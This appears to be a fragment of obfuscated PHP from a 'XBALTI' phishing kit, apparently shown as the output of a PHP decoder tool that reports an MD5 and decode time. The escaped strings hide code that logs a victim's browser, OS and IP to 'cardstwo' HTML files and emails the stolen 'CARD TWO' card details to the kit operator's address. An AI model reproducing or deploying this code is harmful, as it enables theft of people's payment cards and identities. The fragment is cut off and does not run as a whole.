"\xa\x20\40\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\x3c\57\x74\x64\x3e\12\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40\40\x20\x20\40\x3c\164\144\x3e\xa\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40" . XB_Browser($_SERVER["\110\124\x54\120\x5f\125\123\x45\122\137\101\107\105\x4e\x54"]) . "\x20\x4f\x6e\40" . XB_OS($_SERVER["\110\x54\x54\x50\x5f\125\123\105\x52\x5f\x41\x47\x45\116\124"]) . "\12\x20\40\40\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\40\x20\74\x2f\164\144\76\xa\40\40\x20\40\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\40\40\x20\40\40\40\40\40\74\164\144\x3e\12\40\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x7b" . $_SESSION["\x5f\151\x70\137"] . "\x7d\xa\40\40\40\40\40\40\40\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\x3c\x2f\x74\144\x3e\12\11\11\x9\x9\11\x9\40\x20\74\x74\144\x3e\12\x20\x20\40\40\x20\40\40\40\40\40\40\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x20\x20\x20\40" . $TIME_DATE . "\12\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\40\x3c\57\x74\144\76\12\40\40\40\40\40\x20\40\x20\x20\40\x20\x20\40\40\40\x20\x20\40\40\40\40\40\40\40\74\x2f\164\x72\76\12"; $khraha = fopen("\56\x2e\57\x72\x7a\x2f\x63\x61\x72\144\x73\164\167\x6f" . $yourname . "\x2e\x68\x74\x6d\154", "\141"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "\173\x7d\xa"; $khraha = fopen("\56\x2e\x2f\162\172\x2f\x63\141\x72\144\x73\164\167\x6f\x2e\150\164\x6d\x6c", "\141"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "\103\101\122\104\x20\x54\x57\117\40\xf0\x9f\x98\x88\x20\x49\116\106\x4f\x20\106\x52\x4f\x4d\40\xf0\237\230\x88\40\x5b" . $_SESSION["\165\163\x65\x72\151\x64"] . "\x5d\40\360\x9f\230\x88\x20\133" . $_SESSION["\x5f\x69\x70\x5f"] . "\135\40"; $XBALTI_HEADERS .= "\x46\x72\x6f\155\72" . $yourname . "\x20\x3c\167\x65\x62\x6d\141\163\x74\145\x72\x40" . $_SERVER["\110\x54\124\120\x5f\x48\117\123\124"] . "\x3e" . "\xd\12"; $XBALTI_HEADERS = "\x4d\x49\115\105\55\126\x65\162\163\x69\x6f\x6e\x3a\40\61\56\60" . "\xd\xa"; $XBALTI_HEADERS .= "\x43\157\x6e\164\x65\x6e\x74\x2d\164\171\160\x65\72\x74\x65\x78\x74\x2f\150\164\155\154\73\x63\x68\x61\162\163\x65\164\75\125\x54\x46\55\70" . "\xd\12"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto x0oF1; MmPxl: $remote = @$_SERVER["\122\105\115\117\x54\105\x5f\x41\104\104\x52"]; goto dKyNx; vi1gJ: session_start(); goto EvMXe; x0oF1: Function Calls
| None |
Stats
| MD5 | 767af68d113638a790eb1c3fb6bc7321 |
| Eval Count | 0 |
| Decode Time | 70 ms |